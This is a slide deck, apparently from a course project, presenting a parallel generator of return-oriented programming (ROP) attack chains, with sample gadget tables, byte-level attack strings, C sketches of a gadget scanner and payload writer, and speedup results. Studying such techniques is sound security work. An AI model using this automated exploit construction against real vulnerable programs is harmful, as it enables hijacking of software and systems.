
PROPAGANDA: Parallel ROP Attack Generator and Non-Direct Assembler



  1. PROPAGANDA: Parallel ROP Attack Generator and Non-Direct Assembler. Chris Lee and Ben Spinelli.

  2. A return-oriented programming (ROP) attack takes advantage of buffer overflow vulnerabilities in executables to gain control of the program. [Stack diagram: the attack string consists of padding (00 00 00 00 ...) that fills buf, followed by gadget addresses &G1, &G2, ... that clobber the saved return address ret.] Because programs are just sequences of bytes, old-school attacks could input byte code directly. BUT, people fixed this (e.g., by making the stack non-executable), so now we use GADGETS! A hypothetical vulnerable function is sketched below.
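As a minimal sketch (hypothetical code, not the authors' test binary) of the kind of function such an attack exploits: gets() performs no bounds checking, so input longer than buf overruns the stack frame and overwrites the saved return address.

    #include <stdio.h>

    /* Hypothetical vulnerable function: gets() is unbounded (and was
     * removed in C11 for exactly this reason), so a long enough input
     * runs past buf and over the saved return address. */
    void read_input(void) {
        char buf[64];
        gets(buf);   /* attacker controls everything past 64 bytes */
    }

    /* Attack string layout, conceptually:
     *   [padding fills buf and the rest of the frame] [&G1] [&G2] ...
     * so this function's ret jumps to gadget G1 instead of its caller. */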

  3. Gadgets are sequences of bytes within the vulnerable executable that are terminated by 0xc3 (return). After a gadget returns, the program pops the next return address off the stack and continues executing there.

    402e74: 41 5f    pop %r15
    402e76: c3       retq

Starting one byte later, at 0x402e75, the suffix 5f c3 performs pop %rdi; retq (%rdi is the register used for the first argument). So, we just have to create a string like this:

    /* pop %rdi */                   75 2e 40 00 00 00 00 00
    /* stack constant $0xffff */     ff ff 00 00 00 00 00 00
    /* address of withdraw_money */  23 1e 60 00 00 00 00 00

PROFIT!
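A minimal sketch of how such unintended gadgets can be found (hypothetical helper; it assumes the executable's code bytes are already loaded into a buffer): scan for the pattern 5f c3 at every byte offset, since x86 decoding does not require any alignment.

    #include <inttypes.h>
    #include <stddef.h>
    #include <stdint.h>
    #include <stdio.h>

    /* Hypothetical scanner: report every occurrence of 5f c3
     * (pop %rdi; retq), including occurrences hidden inside longer
     * instructions such as 41 5f (pop %r15). */
    void find_pop_rdi(const uint8_t *text, size_t len, uint64_t base) {
        for (size_t i = 0; i + 1 < len; i++) {
            if (text[i] == 0x5f && text[i + 1] == 0xc3)
                printf("pop %%rdi; retq at 0x%" PRIx64 "\n", base + i);
        }
    }

On the bytes above this finds 0x402e75, exactly the address (75 2e 40 00 00 00 00 00, little-endian) written into the attack string.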

  4. We created a parallel ROP attack generator. We perform a parallel search based on a sequence of desired effects (the target) and on equivalence rules; both are provided by the user.

Equivalence rules (S = source, D = destination, t = a fresh variable):

    S → t, t → D    gives    S → D
    S + $0x0 → D    gives    S → D

We grow a tree by applying the given rules and creating variables (t). A node can be:
• matched with a gadget: it becomes a solved leaf.
• matched with a rule: this creates more nodes, which we then solve.
We do this until every endpoint is a solved leaf.
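A minimal sequential sketch of this search (hypothetical types and names; the real generator keeps t symbolic until a gadget binds it and explores branches in parallel, whereas this sketch concretizes t immediately): a goal either matches a gadget and becomes a solved leaf, or is expanded by the first rule, trying each register as the intermediate t.

    #define NUM_REGS 16

    typedef struct { int src, dst; } Goal;   /* "move src into dst" */

    int gadget_exists(Goal g);               /* gadget-table lookup (assumed) */

    /* Solve a goal: either a gadget implements it directly, or apply
     *   S -> t, t -> D  gives  S -> D
     * with every register as a candidate t. The depth bound keeps
     * rules from being applied in an infinite cycle. */
    int solve(Goal g, int depth) {
        if (gadget_exists(g)) return 1;      /* solved leaf */
        if (depth == 0)       return 0;
        for (int t = 0; t < NUM_REGS; t++) {
            if (t == g.src || t == g.dst) continue;
            Goal a = { g.src, t }, b = { t, g.dst };
            if (solve(a, depth - 1) && solve(b, depth - 1))
                return 1;                    /* both subtrees solved */
        }
        return 0;
    }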

  5. This is the result of a completed search.

Target: %rsp + $0x1337 → %rdi

Gadgets found (with their addresses in the executable): %rsp → %rax (0x401c4f), %rcx → %rsi (0x401c2f), %rax → %rdx (0x401c0f), %rdx → %rcx (0x401c08), %rcx → %rdx (0x401bb8), %rdi + %rsi → %rax (0x401b98), pop %rax (0x401b8d), %rax → %rdi (0x401b6c)

Attack string (padding to fill the buffer, then little-endian gadget addresses):

    /* Pad with buffer size */     00 00 00 00 00 00 00 00  (repeated)
    /* Load %rax, $0x1337 */       8d 1b 40 00 00 00 00 00
    /* Stack constant 0x1337 */    37 13 00 00 00 00 00 00
    /* Mov %rdx, %rax */           0f 1c 40 00 00 00 00 00
    /* Mov %rcx, %rdx */           08 1c 40 00 00 00 00 00
    /* Mov %rsi, %rcx */           2f 1c 40 00 00 00 00 00
    /* Mov %rax, %rsp */           4f 1c 40 00 00 00 00 00
    /* Arith %rax, %rdi+%rsi */    98 1b 40 00 00 00 00 00
    /* Mov %rdi, %rax */           6c 1b 40 00 00 00 00 00
    /* Call target function */     01 23 45 67 89 ab cd ef

Complete tree (grows upwards from the target at the root): the target %rsp + $0x1337 → %rdi is split by the rules into subgoals with fresh variables (%rsp → t0, $0x1337 → t1, t0 + t1 → %rdi), which are expanded further (t0 → t2, t1 → t3 → t4 → t5, t2 + t5 → t6, t6 → %rdi) until every leaf is a solved gadget: %rsp → %rax, pop %rax ($0x1337), %rax → %rdx, %rdx → %rcx, %rcx → %rsi, %rdi + %rsi → %rax, %rax → %rdi.
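A minimal sketch of serializing such a result into attack-string bytes (hypothetical program; the 72-byte padding and output filename are assumptions for illustration): each gadget address is written as a 64-bit little-endian quadword, which is what produces rows like 8d 1b 40 00 00 00 00 00.

    #include <stdint.h>
    #include <stdio.h>

    /* Write a 64-bit value in little-endian byte order. */
    static void emit_qword(FILE *out, uint64_t v) {
        for (int i = 0; i < 8; i++)
            fputc((int)((v >> (8 * i)) & 0xff), out);
    }

    int main(void) {
        FILE *out = fopen("attack_string", "wb");
        if (!out) return 1;
        for (int i = 0; i < 72; i++)      /* padding: buffer size (assumed) */
            fputc(0x00, out);
        emit_qword(out, 0x401b8d);        /* pop %rax */
        emit_qword(out, 0x1337);          /* stack constant $0x1337 */
        emit_qword(out, 0x401c0f);        /* %rax -> %rdx */
        /* ... remaining gadget addresses in serialized order ... */
        fclose(out);
        return 0;
    }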

  6. Our algorithm was difficult to implement because of domain-imposed constraints:
1. Preventing infinite looping: how do we prevent a cycle of applied rules?
2. Synchronizing variables: when a variable gets a value, how do we update that value across all branches that share it? And how do we backtrack if that value fails?
3. Serializing gadgets: all instructions share a small number of registers, so how do we prevent them from clobbering each other's resources? (A sketch of this check follows below.)
We solved these problems. Check our writeup for details. :D
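For problem 3, a minimal sketch of a clobber check (hypothetical representation, not the authors' actual data structures): each gadget records which registers it writes, each value records the gadgets that produce and consume it, and an ordering is rejected if a value is overwritten while still in flight.

    #include <stdint.h>

    /* Hypothetical gadget summary: the registers it writes, as a
     * bitmask over the 16 general-purpose registers. */
    typedef struct { uint16_t writes; } GadgetFx;

    /* A value lives in register reg from the gadget that produces it
     * until the gadget that consumes it. */
    typedef struct { int reg, produced_by, consumed_by; } LiveValue;

    /* Accept an ordering only if no gadget between a value's producer
     * and its consumer writes the register carrying that value. */
    int serialization_ok(const GadgetFx *seq,
                         const LiveValue *vals, int nvals) {
        for (int v = 0; v < nvals; v++)
            for (int g = vals[v].produced_by + 1; g < vals[v].consumed_by; g++)
                if (seq[g].writes & (1u << vals[v].reg))
                    return 0;   /* value clobbered in flight */
        return 1;
    }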

  7. We parallelized our algorithm by distributing work before the search occurs. [Diagram: the original target is split into Chunk 0 through Chunk 3; running on 2 threads, T0 and T1 each take a chunk while Chunks 2 and 3 wait in a global work queue.] We wanted to minimize synchronization between threads. We did implement parallelism with much finer-grained work distribution, but the cost of synchronization outweighed the benefit of the finer-grained distribution.
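A minimal sketch of this scheme (hypothetical names; solve_chunk stands in for searching one pre-split piece of the target): the global work queue is just a shared counter, so the only synchronization between threads is one atomic increment per chunk.

    #include <pthread.h>
    #include <stdatomic.h>

    #define NUM_CHUNKS  4
    #define NUM_THREADS 2

    extern void solve_chunk(int chunk);   /* search one subtree (assumed) */

    static atomic_int next_chunk;         /* the global work queue */

    static void *worker(void *arg) {
        (void)arg;
        int c;
        while ((c = atomic_fetch_add(&next_chunk, 1)) < NUM_CHUNKS)
            solve_chunk(c);               /* run a chunk to completion */
        return NULL;
    }

    int main(void) {
        pthread_t tid[NUM_THREADS];
        for (int i = 0; i < NUM_THREADS; i++)
            pthread_create(&tid[i], NULL, worker, NULL);
        for (int i = 0; i < NUM_THREADS; i++)
            pthread_join(tid[i], NULL);
        return 0;
    }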

  8. Speedup is limited by attack target size. Typical targets aren't heavily imbalanced, so our work distribution is OK. [Speedup plot for large, medium, and small targets; run on a 6-core GHC machine (GHC38).]

  9. Workload imbalance is the main barrier to parallelism. We have to assign nodes to threads before knowing how much work each node will need. [Speedup plot; run on a 6-core GHC machine (GHC38).]

  10. Short-circuiting on failure can result in super-linear speedup. Note: in this case we get a 50x speedup, but that number just depends on the disparity of the branch sizes. [Plot comparing the case where one branch fails earlier against the case where all branches fail at around the same time; run on a 6-core GHC machine (GHC38).]
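A minimal sketch of such short-circuiting (hypothetical; a real search would poll the flag throughout its inner loop, not just at branch entry): because every branch must succeed for the target to be solvable, the first thread to prove its branch infeasible sets a shared flag, and the other threads stop early instead of finishing their branches.

    #include <stdatomic.h>
    #include <stdbool.h>

    static atomic_bool target_failed;          /* set once any branch fails */

    extern bool try_solve_branch(int branch);  /* per-branch search (assumed) */

    bool solve_branch_with_abort(int branch) {
        if (atomic_load(&target_failed))
            return false;                      /* another branch failed first */
        bool ok = try_solve_branch(branch);
        if (!ok)
            atomic_store(&target_failed, true);   /* broadcast the failure */
        return ok;
    }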

  11. LIVE DEMO!!!! ✧ ۹ (• ́ ⌄ • ́ ๑ ) و ✧
